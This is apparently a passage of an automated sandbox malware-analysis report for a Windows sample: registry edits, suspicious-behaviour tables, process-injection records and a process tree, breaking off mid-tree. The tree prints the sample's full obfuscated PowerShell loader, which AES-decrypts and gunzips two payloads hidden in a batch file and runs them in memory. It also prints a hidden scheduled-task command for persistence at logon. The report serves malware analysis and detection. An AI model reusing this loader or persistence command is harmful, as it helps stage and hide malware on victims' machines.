Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655992024854"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133641655965644999"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655283604926"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655960914783"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ITT = "133641655790862123"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655751018336"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exemshta.exe

pid	process
2652	powershell.exe
2652	powershell.exe
2736	powershell.exe
2736	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
3972	msedge.exe
3972	msedge.exe
2340	msedge.exe
2340	msedge.exe
2604	identity_helper.exe
2604	identity_helper.exe
3740	powershell.exe
3740	powershell.exe
856	powershell.exe
856	powershell.exe
3740	powershell.exe
856	powershell.exe
4664	powershell.exe
4664	powershell.exe
2688	powershell.exe
2688	powershell.exe
4664	powershell.exe
2688	powershell.exe
2360	svchost.exe
2360	svchost.exe
4996	mshta.exe
4996	mshta.exe
4996	mshta.exe
4996	mshta.exe
4996	mshta.exe
4996	mshta.exe
2360	svchost.exe
2360	svchost.exe
2360	svchost.exe
2360	svchost.exe
4996	mshta.exe
4996	mshta.exe
2360	svchost.exe
2360	svchost.exe
4996	mshta.exe
4996	mshta.exe
2360	svchost.exe
2360	svchost.exe
4996	mshta.exe
4996	mshta.exe
2360	svchost.exe
2360	svchost.exe
4996	mshta.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3488 Explorer.EXE
Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid

4
4
4
4
4
656
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

Processes:

msedge.exe

pid process

2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe
2340 msedge.exe

pid	process
3488	Explorer.EXE

pid
4
4
4
4
4
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeIncreaseQuotaPrivilege	2736	powershell.exe
Token: SeSecurityPrivilege	2736	powershell.exe
Token: SeTakeOwnershipPrivilege	2736	powershell.exe
Token: SeLoadDriverPrivilege	2736	powershell.exe
Token: SeSystemProfilePrivilege	2736	powershell.exe
Token: SeSystemtimePrivilege	2736	powershell.exe
Token: SeProfSingleProcessPrivilege	2736	powershell.exe
Token: SeIncBasePriorityPrivilege	2736	powershell.exe
Token: SeCreatePagefilePrivilege	2736	powershell.exe
Token: SeBackupPrivilege	2736	powershell.exe
Token: SeRestorePrivilege	2736	powershell.exe
Token: SeShutdownPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeSystemEnvironmentPrivilege	2736	powershell.exe
Token: SeRemoteShutdownPrivilege	2736	powershell.exe
Token: SeUndockPrivilege	2736	powershell.exe
Token: SeManageVolumePrivilege	2736	powershell.exe
Token: 33	2736	powershell.exe
Token: 34	2736	powershell.exe
Token: 35	2736	powershell.exe
Token: 36	2736	powershell.exe
Token: SeIncreaseQuotaPrivilege	2736	powershell.exe
Token: SeSecurityPrivilege	2736	powershell.exe
Token: SeTakeOwnershipPrivilege	2736	powershell.exe
Token: SeLoadDriverPrivilege	2736	powershell.exe
Token: SeSystemProfilePrivilege	2736	powershell.exe
Token: SeSystemtimePrivilege	2736	powershell.exe
Token: SeProfSingleProcessPrivilege	2736	powershell.exe
Token: SeIncBasePriorityPrivilege	2736	powershell.exe
Token: SeCreatePagefilePrivilege	2736	powershell.exe
Token: SeBackupPrivilege	2736	powershell.exe
Token: SeRestorePrivilege	2736	powershell.exe
Token: SeShutdownPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeSystemEnvironmentPrivilege	2736	powershell.exe
Token: SeRemoteShutdownPrivilege	2736	powershell.exe
Token: SeUndockPrivilege	2736	powershell.exe
Token: SeManageVolumePrivilege	2736	powershell.exe
Token: 33	2736	powershell.exe
Token: 34	2736	powershell.exe
Token: 35	2736	powershell.exe
Token: 36	2736	powershell.exe
Token: SeIncreaseQuotaPrivilege	2736	powershell.exe
Token: SeSecurityPrivilege	2736	powershell.exe
Token: SeTakeOwnershipPrivilege	2736	powershell.exe
Token: SeLoadDriverPrivilege	2736	powershell.exe
Token: SeSystemProfilePrivilege	2736	powershell.exe
Token: SeSystemtimePrivilege	2736	powershell.exe
Token: SeProfSingleProcessPrivilege	2736	powershell.exe
Token: SeIncBasePriorityPrivilege	2736	powershell.exe
Token: SeCreatePagefilePrivilege	2736	powershell.exe
Token: SeBackupPrivilege	2736	powershell.exe
Token: SeRestorePrivilege	2736	powershell.exe
Token: SeShutdownPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeSystemEnvironmentPrivilege	2736	powershell.exe
Token: SeRemoteShutdownPrivilege	2736	powershell.exe
Token: SeUndockPrivilege	2736	powershell.exe
Token: SeManageVolumePrivilege	2736	powershell.exe
Token: 33	2736	powershell.exe
Token: 34	2736	powershell.exe
Token: 35	2736	powershell.exe

Suspicious use of FindShellTrayWindow 32 IoCs

Processes:

msedge.exeExplorer.EXEmsdt.exe

pid	process
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
5892	msdt.exe
3488	Explorer.EXE
3488	Explorer.EXE
2340	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exeExplorer.EXE

pid	process
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
2340	msedge.exe
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

svchost.exemshta.exeExplorer.EXE

pid process

2360 svchost.exe
4996 mshta.exe
3488 Explorer.EXE
3488 Explorer.EXE
3488 Explorer.EXE
3488 Explorer.EXE
3488 Explorer.EXE
3488 Explorer.EXE

pid	process
2360	svchost.exe
4996	mshta.exe
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 4600 wrote to memory of 264	4600	cmd.exe	cmd.exe
PID 4600 wrote to memory of 264	4600	cmd.exe	cmd.exe
PID 4600 wrote to memory of 2652	4600	cmd.exe	powershell.exe
PID 4600 wrote to memory of 2652	4600	cmd.exe	powershell.exe
PID 2652 wrote to memory of 2736	2652	powershell.exe	powershell.exe
PID 2652 wrote to memory of 2736	2652	powershell.exe	powershell.exe
PID 2652 wrote to memory of 2148	2652	powershell.exe	WScript.exe
PID 2652 wrote to memory of 2148	2652	powershell.exe	WScript.exe
PID 2148 wrote to memory of 1756	2148	WScript.exe	cmd.exe
PID 2148 wrote to memory of 1756	2148	WScript.exe	cmd.exe
PID 1756 wrote to memory of 412	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 412	1756	cmd.exe	cmd.exe
PID 1756 wrote to memory of 620	1756	cmd.exe	powershell.exe
PID 1756 wrote to memory of 620	1756	cmd.exe	powershell.exe
PID 620 wrote to memory of 3488	620	powershell.exe	Explorer.EXE
PID 620 wrote to memory of 2560	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1968	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1372	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1764	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1564	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1124	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2740	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1552	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2728	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1788	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1736	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 3620	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1132	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 3692	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2312	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1316	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1116	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2884	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1700	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2680	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2876	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 5032	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 912	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 508	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 896	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2056	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2252	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1660	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1460	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2244	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2036	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2232	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1144	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 944	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1820	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1224	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 4376	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2992	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1216	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 2976	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1000	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1328	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 788	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 3356	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 1976	620	powershell.exe	svchost.exe
PID 620 wrote to memory of 744	620	powershell.exe	hat.exe
PID 620 wrote to memory of 744	620	powershell.exe	hat.exe
PID 620 wrote to memory of 744	620	powershell.exe	hat.exe
PID 620 wrote to memory of 4996	620	powershell.exe	mshta.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Checks processor information in registry
- Modifies registry class
PID:788

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
2⤵
PID:1828

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
2⤵
PID:4564

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
2⤵
PID:3276

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
2⤵
PID:3296

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
2⤵
PID:5164

C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
2⤵
PID:6108

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4408

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5984

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
2⤵
PID:5268

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
2⤵
PID:6140

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
2⤵
PID:5412

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
2⤵
PID:5376

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
2⤵
PID:1940

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
2⤵
PID:6424

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
2⤵
PID:6588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
2⤵
PID:7088

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
2⤵
PID:6504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
- Modifies firewall policy service
- Modifies security service
PID:2232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3356

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Output.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Local\Temp\Output.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_962_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\cmd.exe
